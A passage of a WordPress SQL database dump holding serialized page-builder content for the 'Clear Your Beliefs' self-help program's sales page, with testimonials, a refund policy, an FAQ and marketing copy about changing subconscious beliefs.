class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1583, 2028, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60613:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n \n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal 